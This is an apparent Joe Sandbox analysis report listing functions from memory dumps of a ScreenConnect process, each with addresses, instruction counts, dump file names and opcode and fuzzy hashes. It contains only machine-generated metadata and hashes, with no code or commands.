                                                                                                                                                                                                                                                        • Instruction ID: 4be73367b364d71082ebb12830f1b368287149af0fd964bc50b705f4ef46881e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba112907a59f40735d1aa8b44d4fddaa32907da892cb38e316b64051ccc3adce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0512330B003029FE710AB78D84062EB7E2BFC5704B14C569E856AB354DFB5EC4ACB82
                                                                                                                                                                                                                                                        Function 040D2AB0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fe96352a0c2c2e5b01bb8e5a6936628b797cc08ae0c11f7b05ce84af13fd3f7d
                                                                                                                                                                                                                                                        • Instruction ID: a494c8d95771ef5c70f13bfc099d25e5ed0a712db5f0b4d9d060b73f0278cd28
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe96352a0c2c2e5b01bb8e5a6936628b797cc08ae0c11f7b05ce84af13fd3f7d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E512530700702CFDB24DF29D884A5AB7F6BF893147108A58E486EB764EB70F8498F90
                                                                                                                                                                                                                                                        Function 019184A0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d452a20063befde0d1a83d544bf32c7cecd641691a98d01038607f74ee6620ad
                                                                                                                                                                                                                                                        • Instruction ID: 19742ff2c742fb8060a8b10ce1db631b695701dbfe8096329c3c5fef4aea2866
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d452a20063befde0d1a83d544bf32c7cecd641691a98d01038607f74ee6620ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F510730600B05CFD724DF29D484A66B7F6FF8D225B248A5CE49A9B7A8DB31E841DF44
                                                                                                                                                                                                                                                        Function 0191B2D0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4c181389e6d45e80c0609700cfe7fbd40903f977b29477dc93fb0147a1eb12a1
                                                                                                                                                                                                                                                        • Instruction ID: ab65aae169dfcc4819c8e36199154978e8e61f1712e6bb8a6f0c430f744429ed
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c181389e6d45e80c0609700cfe7fbd40903f977b29477dc93fb0147a1eb12a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C517A70E503099FDB01DFA8D854BDDB7B1FF89300F208569E405AB290EB74A985CF61
                                                                                                                                                                                                                                                        Function 040D4358 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 389aee13dfb20f6d238cbd9e95d31f4dde799a8bc7a46a5b7d77a0b1206bb21b
                                                                                                                                                                                                                                                        • Instruction ID: fbf395e8e59ad9bd2d4b2c0a8dc6a687f574cf0474bb29841caa74fc9790a6d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389aee13dfb20f6d238cbd9e95d31f4dde799a8bc7a46a5b7d77a0b1206bb21b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B41E670600701CFD774DF29D84462AB7F6BF89315B148A28E496AB7A5EB70F846CF80
                                                                                                                                                                                                                                                        Function 0191B2C0 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b38a121d0cd0cbacc927a6fdb360e9b4deb5c00c1f24b9b987aa384ef44e5fb1
                                                                                                                                                                                                                                                        • Instruction ID: ddb01cb7c2e3460aac6a3ccdcd8877288f13faf22a19b403b8a26b684223ef89
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b38a121d0cd0cbacc927a6fdb360e9b4deb5c00c1f24b9b987aa384ef44e5fb1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47514970E503099FEB01DFA8D854BDDBBB2FF89300F108669E505AB294DB74A995CF50
                                                                                                                                                                                                                                                        Function 01917E50 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c72641d1ba8078b4b948f35951537981e564206c122ae7303f33b3bcdafc090f
                                                                                                                                                                                                                                                        • Instruction ID: 0e572990d8199871aa1dece028863c5c53b1032fefbdb8327891ce85bcf5c878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c72641d1ba8078b4b948f35951537981e564206c122ae7303f33b3bcdafc090f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D541E530A00206CBDB15DFA8D494A6EBBB6EFC4311F04C159E80AAB349DB74ED46CF91
                                                                                                                                                                                                                                                        Function 0191EF67 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6f279f508ee3cedb46b3e1c62cec15e0eb80fedf1e5e3b40beda6d3d33065dad
                                                                                                                                                                                                                                                        • Instruction ID: 23ea18888dd6078568ee5982ca3c315c2b1891ce20767c00f249cbdb7b880272
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f279f508ee3cedb46b3e1c62cec15e0eb80fedf1e5e3b40beda6d3d33065dad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54415431E0021D9BEB15DFA9C490ADEBBB5FF85700F248129E515B7344DB70A985CB91
                                                                                                                                                                                                                                                        Function 0191846B Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1d2f1759f45fbf3a7eafbd4dc5f87e1fea2e2b3e41f5516144f9686e1de5fed5
                                                                                                                                                                                                                                                        • Instruction ID: 0fd11835b3c32429b7a983175d6ed36680d61af10e298513b8c01fd30d837bf9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2f1759f45fbf3a7eafbd4dc5f87e1fea2e2b3e41f5516144f9686e1de5fed5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11417D34600705CFD721CF28C894A26B7F6FF8E2257148A99D48ACB7A6DB31F846DB51
                                                                                                                                                                                                                                                        Function 040D4128 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f0a3e2b7171a99da9da455e4af8859b1e473a540d151b0845dcc03ff42286522
                                                                                                                                                                                                                                                        • Instruction ID: 57750348027c111544294ad4b8476767a9ff7be4f52c2f3787657969e9e0538b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0a3e2b7171a99da9da455e4af8859b1e473a540d151b0845dcc03ff42286522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76413C74700701CFD720CF69C88466AB7F2BF89354B548658D4969B7A5E730F94ACF90
                                                                                                                                                                                                                                                        Function 01919968 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7e83de2e47a5580e7d3bdd3f0d65d05215749645d5bcab9ac093b65aa651553
                                                                                                                                                                                                                                                        • Instruction ID: baa791c31d79ce6d1b25b391380db434eb5814d9a5de8f60fda8674f6080805f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7e83de2e47a5580e7d3bdd3f0d65d05215749645d5bcab9ac093b65aa651553
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C41BD317002059FDB14DF69D894AADBBF6BF88614F20846CE40AEB364DF70AD49CB90
                                                                                                                                                                                                                                                        Function 01914C62 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e3ad35ab256499165dc83a4a4b9806b7d8d14fdf3c268edc2427191ef913c8d
                                                                                                                                                                                                                                                        • Instruction ID: 651b5135e798ac3ddfbdea1152dacd0f2a0884b5d0dd37dc5c101806c2a45e75
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e3ad35ab256499165dc83a4a4b9806b7d8d14fdf3c268edc2427191ef913c8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5541B071A013189FEB209F68D804B9EBBB5FF48310F4081E9D51CA7280DB746E89CF92
                                                                                                                                                                                                                                                        Function 01916FE8 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 490e43f6a6e9f0ea2a9d9c82f2cfb33a0c59c72f4c632493cc85c0fedc589591
                                                                                                                                                                                                                                                        • Instruction ID: e177f34ec773ab6b726132832ef414e8b322e43e314c39d514923e7581ea4599
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 490e43f6a6e9f0ea2a9d9c82f2cfb33a0c59c72f4c632493cc85c0fedc589591
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F931F371B003065BD701AB7C999059EB7E2FF85610340C96DD94AEB305EFB4EE468BD2
                                                                                                                                                                                                                                                        Function 01917920 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d544244201f71d4af7d318ceb0d2d1f470efe30106cce82271367c03ff3360fc
                                                                                                                                                                                                                                                        • Instruction ID: 1d2f70d4d62ca61d346bd2e5cb61573ab754d49ae6ba238fbe2b426355f91508
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d544244201f71d4af7d318ceb0d2d1f470efe30106cce82271367c03ff3360fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2731C231B0020A8FEB188FA9D054AAEF7FAEF89255F009469D50AE7754DB70DD408B90
                                                                                                                                                                                                                                                        Function 01919978 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e92c460f03ad0ed451b7bcb1e526dac5bda3cfd8f0c08b81440b6245db1be241
                                                                                                                                                                                                                                                        • Instruction ID: 9375cd2c4741c01ddc7ade318cd1810f623af63da2b7a5622023ea30671c94a1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e92c460f03ad0ed451b7bcb1e526dac5bda3cfd8f0c08b81440b6245db1be241
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8441AE307002159FDB14DF69D854AAD7BF6BF88610B108468E406E73A4DF70AD48CB90
                                                                                                                                                                                                                                                        Function 040D28E0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b970f28d39d5261996c7292c7bceb7b4ae31af9a6750d3bdef08b07bc2156b49
                                                                                                                                                                                                                                                        • Instruction ID: 36570a6c97f4f58e4e322dd3951e030db6594b81cc30cdc629416876267a3e88
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b970f28d39d5261996c7292c7bceb7b4ae31af9a6750d3bdef08b07bc2156b49
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7315230B002059FEF14DBA9D480AAEF7FAEF89214B10C46AD819F7744DB70ED458BA1
                                                                                                                                                                                                                                                        Function 040D4610 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bb74ea0491afff95eb5e9a22f0b23b49b5980329bad6e8368763adb152bf2107
                                                                                                                                                                                                                                                        • Instruction ID: 68cafe2cc0272534a35bef7109e21615f1af9d00feb15eb49d792d36f66ab91a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb74ea0491afff95eb5e9a22f0b23b49b5980329bad6e8368763adb152bf2107
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44317071A043488FDB14EF64D955BDD7BF1BF4A300F0244AAD046BB362DA786D85CB51
                                                                                                                                                                                                                                                        Function 01916FF8 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d9aafa6f740ee4096fdf915861526daea1ba5ed0262bd83d8810f474d896710
                                                                                                                                                                                                                                                        • Instruction ID: 2a5fb7f1797f8b55c8156350a170731b3819602a04ec839f8c7d9f3b64e9e478
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d9aafa6f740ee4096fdf915861526daea1ba5ed0262bd83d8810f474d896710
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5631D070B003065B9701ABBC999055EB7E6FF89650340C92DD94AEB304EFB4FD468BE2
                                                                                                                                                                                                                                                        Function 040D4E40 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f023ce0107f156de9e69ea5de354f1389debfdcb3088f91eb35ba21f02a2102b
                                                                                                                                                                                                                                                        • Instruction ID: 4260aa17438bb9d2c71d9c9b0482f34cd328f0590af5c09efee9cf88eab2dbca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f023ce0107f156de9e69ea5de354f1389debfdcb3088f91eb35ba21f02a2102b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A31F7707043415FD705EB39C951A9EBBE2AFC6700B558459D002EF3A2DFB0ED0A8B52
                                                                                                                                                                                                                                                        Function 040D17BF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c95736dcba648a887590363e6a4ee885ff581f9ecf293cbeb6390702309c3c5e
                                                                                                                                                                                                                                                        • Instruction ID: c369c760f0883891fe4add38c61c69eb5efda55271270b0ea240b470d522f1b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c95736dcba648a887590363e6a4ee885ff581f9ecf293cbeb6390702309c3c5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 023178712243425FE301AB24E894BE9B775FF96304B448559D0829B262CFB4BD4B8BE6
                                                                                                                                                                                                                                                        Function 0191D7F8 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: adccae41ea551494151ff164e5d7110b07f7509c22f69f3d2ee10231bcb2277c
                                                                                                                                                                                                                                                        • Instruction ID: 7c6643e8eee3bbab94374f67060ba9991a70b034a55e784de2495e5539b20219
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: adccae41ea551494151ff164e5d7110b07f7509c22f69f3d2ee10231bcb2277c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19314D70600B05DFDB30CF69C84866AB7F5EF49324B148B5CD49A9B6A5D770E586CF80
                                                                                                                                                                                                                                                        Function 040D2CF8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 411428a94f2c35f4b24c198d6ca66ac26e57546b90e73dfc8f3d64969d8bcea3
                                                                                                                                                                                                                                                        • Instruction ID: 4b19f63fc3b9832f430f69244c82c2bca1774c69a5333e000c48d8e0de45508a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 411428a94f2c35f4b24c198d6ca66ac26e57546b90e73dfc8f3d64969d8bcea3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131F730601B018FC774DF29D84865AB7F1EF84711B104A2CE4A79B6E4EB70EA49CB91
                                                                                                                                                                                                                                                        Function 040D0006 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7712bd2f16e7e1ffea43400e3f0edeba381d5bc472cfd0672b2dfa128183ba84
                                                                                                                                                                                                                                                        • Instruction ID: 5d2fce5d4a694e914030276d75a35b880fa3cf95e3c2e277b13fb718ad24d7bb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7712bd2f16e7e1ffea43400e3f0edeba381d5bc472cfd0672b2dfa128183ba84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED31E630B063449FDF15CB74D8A97AD7FB2AF8A308F14406EE402A7295DE746E0ACB51
                                                                                                                                                                                                                                                        Function 01916568 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2462daa3858787138a96f09feac18530a957965144e1aa106e12b888d83ca27e
                                                                                                                                                                                                                                                        • Instruction ID: 843f405ecec07a3f7df0d747de0a8c8ba6faf9fc6c22ef10035ac5a8779e0c54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2462daa3858787138a96f09feac18530a957965144e1aa106e12b888d83ca27e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7313E30A00705CFD730DF2AC844A6ABBF5EF89255B148A1CD49AD77A5D770E986CF90
                                                                                                                                                                                                                                                        Function 0191D808 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
